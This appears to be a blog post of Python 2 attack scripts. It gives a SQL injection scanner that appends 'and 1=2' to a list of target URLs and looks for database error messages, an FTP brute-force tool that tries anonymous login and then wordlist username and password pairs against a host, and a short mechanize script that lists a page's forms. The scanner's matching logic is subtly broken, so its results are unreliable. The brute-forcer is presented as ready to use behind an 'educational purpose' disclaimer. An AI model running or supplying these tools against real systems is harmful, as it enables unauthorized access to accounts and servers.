Injection point finder hacker python

python SQL Injection Scaner

#!/usr/bin/python
#-*-coding=utf-8-*-
 #Example site:@http://www.apostilando.com/pagina.php?cod=1
#Write the web site to be scanned to the current catalog file. Python xxx.py xxx.txt

import urllib
import os
import sys

if os.name == "nt":
    os.system("cls")
else:
    os.system("clear")
def usage():
    print """
    =================SQL INJECTION=====================
    Usage:python %s %s
    """ %(sys.argv[0],sys.argv[1])
    
def scanner(url):
    try:
        page = urllib.urlopen(url).read()
    except:
        print "[-]Error!!!\n"
        return(0)
#   If a website has SQL injection, the following error will appear when you use the basic test method to test. 
    sqls = ("mysql_result(): supplied argument is not a valid MySQL result resource in",
            "[Microsoft][ODBC SQL Server Driver][SQL Server]",
            "Warning:ociexecute",
            "Warning: pq_query[function.pg-query]:")
    i=0
    page = str(page.lower())
    while i<len(sqls):
        sql = str(sqls[i]).lower()
        if page.find(sql[i]) == -1:
            check=0
        else:
            check=1
        i+=1
    if check == 0:
        print "[-]"+url+" <No Vulneravel>"
    else:
        print "[+]"+url+" <Vulneravel>"
        
def main(args):
    if len(args)!=1:
        usage()
        print "\t[-]Mode to use: %s <File>\n" % sys.argv[0]
        print "\t[-]Example: %s Site.txt\n" % sys.argv[0]
#        print sys.argv[0],sys.argv[1],len(args)
        sys.exit(0)
    usage()
    try:
        f = open(str(sys.argv[1]),"r")
        urls = f.readlines()
#        print urls
    except:
        print "[+]Error to open the file "+sys.argv[1]+""
        return(-1)
    f.close()
    i=0
    while i<len(urls):
        if urls[i].find("http://") == -1:
            urls[i] = "http://" + urls[i]
        urls[i] = urls[i].replace("\n","")
#        Use the basic placement method to test, such as: and 1=1, and 1=2, ', to see if there is an error message in sqls.
        a = scanner(urls[i]+"and 1=2")
        i+=1
        
if __name__ == "__main__":
    main(sys.argv[1:])

FTP Brute Forcing Tool -- Python FTP brute force tool

In the current directory resume your own user name and password dictionary, you can crack the user name and password.

#!/usr/bin/env python
#-*-coding = utf-8-*-
import sys, os, time   
from ftplib import FTP

docs = """
    [*] This was written for educational purpose and pentest only. Use it at your own risk.
    [*] Author will be not responsible for any damage!
    [*] Toolname        : ftp_bf.py
    [*] Coder           : 
    [*] Version         : 0.1
    [*] ample of use  : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
    """

if sys.platform == 'linux' or sys.platform == 'linux2':
    clearing = 'clear'
else:
    clearing = 'cls'
os.system(clearing)

R = "\033[31m";
G = "\033[32m";
Y = "\033[33m"
END = "\033[0m"

def logo():
    print G+"\n         |---------------------------------------------------------------|"
    print "        |                                                               |"
        print "        |          blog.sina.com.cn/kaiyongdeng                    |"
        print "        |            08/05/2012 ftp_bf.py v.0.1                     |"
    print "        |            FTP Brute Forcing Tool                       |"
        print "        |                                                               |"
        print "        |---------------------------------------------------------------|\n"
    print "    \n         [-] %s\n" % time.strftime("%X")
    print docs+END
    
def help():
        print R+"[*]-t, --target            ip/hostname     <> Our target"
    print "[*]-u, --usernamelist      usernamelist    <> usernamelist path"
    print "[*]-p, --passwordlist      passwordlist    <> passwordlist path"
    print "[*]-h, --help              help            <> print this help"
    print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END
    sys.exit(1)

def bf_login(hostname,username,password):
#    sys.stdout.write("\r[!]Checking : %s " % (p))
#    sys.stdout.flush()
    try:
        ftp = FTP(hostname)
        ftp.login(username, password)
        ftp.retrlines('list')
        ftp.quit()
        print Y+"\n[!] w00t,w00t!!! We did it ! "
        print "[+] Target : ",hostname, ""
        print "[+] User : ",username, ""
        print "[+] Password : ",password, ""+END
        return 1
#        sys.exit(1)
    except Exception, e:
        pass
    except KeyboardInterrupt:
        print R+"\n[-] Exiting ...\n"+END
        sys.exit(1)

def anon_login(hostname):
    try:
        print G+"\n[!] Checking for anonymous login.\n"+END
        ftp = FTP(hostname)
        ftp.login()
        ftp.retrlines('LIST')
        print Y+"\n[!] w00t,w00t!!! Anonymous login successfuly !\n"+END
        
        ftp.quit()
    except Exception, e:
        print R+"\n[-] Anonymous login failed...\n"+END
        pass
def main():
    logo()
    try:
        for arg in sys.argv:
            if arg.lower() == '-t' or arg.lower() == '--target':
                hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-u' or arg.lower() == '--usernamelist':
                usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-p' or arg.lower() == '--passwordlist':
                passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-h' or arg.lower() == '--help':
                help()
            elif len(sys.argv) <= 1:
                help()
    except:
        print R+"[-]Cheak your parametars input\n"+END
        help()
    print G+"[!] BruteForcing target ..."+END
    anon_login(hostname)
#    print "here is ok"
#    print hostname
    try:    
        usernames = open(usernamelist, "r")
        user = usernames.readlines()
        count1 = 0
        while count1 < len(user):
            user[count1] = user[count1].strip()
            count1 +=1
    except: 
        print R+"\n[-] Cheak your usernamelist path\n"+END
        sys.exit(1)
#    print "here is ok ",usernamelist,passwordlist
    try:
        passwords = open(passwordlist, "r")
        pwd = passwords.readlines()
        count2 = 0
        while count2 < len(pwd):
            pwd[count2] = pwd[count2].strip()
            count2 +=1
    except:
        print R+"\n[-] Check your passwordlist path\n"+END
        sys.exit(1)

    print G+"\n[+] Loaded:",len(user),"usernames"
    print "\n[+] Loaded:",len(pwd),"passwords"
    print "[+] Target:",hostname
    print "[+] Guessing...\n"+END

    for u in user:
        for p in pwd:
            result = bf_login(hostname,u.replace("\n",""),p.replace("\n",""))
            if result != 1:
                print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END
            else:
                print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END
    if not result :
        print R+"\n[-]There is no username ans password enabled in the list."
        print "[-]Exiting...\n"+END

if __name__ == "__main__":
    main()

Powerful python module - mechanize

Today, I found a good python module of NB. Let's have a look. It's better than our own urllib and urllib2!!!

  • mechanize.Browser and mechanize.UserAgentBase implement the interface of urllib2.OpenerDirector, so:
    • any URL can be opened, not just http:
    • mechanize.UserAgentBase offers easy dynamic configuration of user-agent features like protocol, cookie, redirection and robots.txt handling, without having to make a new OpenerDirector each time, e.g. by calling build_opener().
  • Easy HTML form filling.
  • Convenient link parsing and following.
  • Browser history (.back() and .reload() methods).
  • The Referer HTTP header is added properly (optional).
  • Automatic observance of robots.txt.
  • Automatic handling of HTTP-Equiv and Refresh.

Extract web form information

#!/usr/bin/env python

#-*-coding = utf-8-*-

import mechanize
import sys

br = mechanize.Browser()
response = br.open(sys.argv[1])
for form in br.forms():
    print "name:[%r] id:[%r] action:[%s]" %(form.name, form.attrs.get('id'), form.action)
    print "Controls: "
    for control in form.controls:
        print '    ', control.type, control.name, repr(control.value)
    print(" ")


This is the simplest script I have seen to extract form information from web pages by using python, which is short and pithy. The key lies in its mechanize module. There are few introductions to this module on the Internet. It's all on your own!

Tags: ftp Python SQL PHP

Posted on Fri, 01 Nov 2019 20:25:16 -0400 by jl9148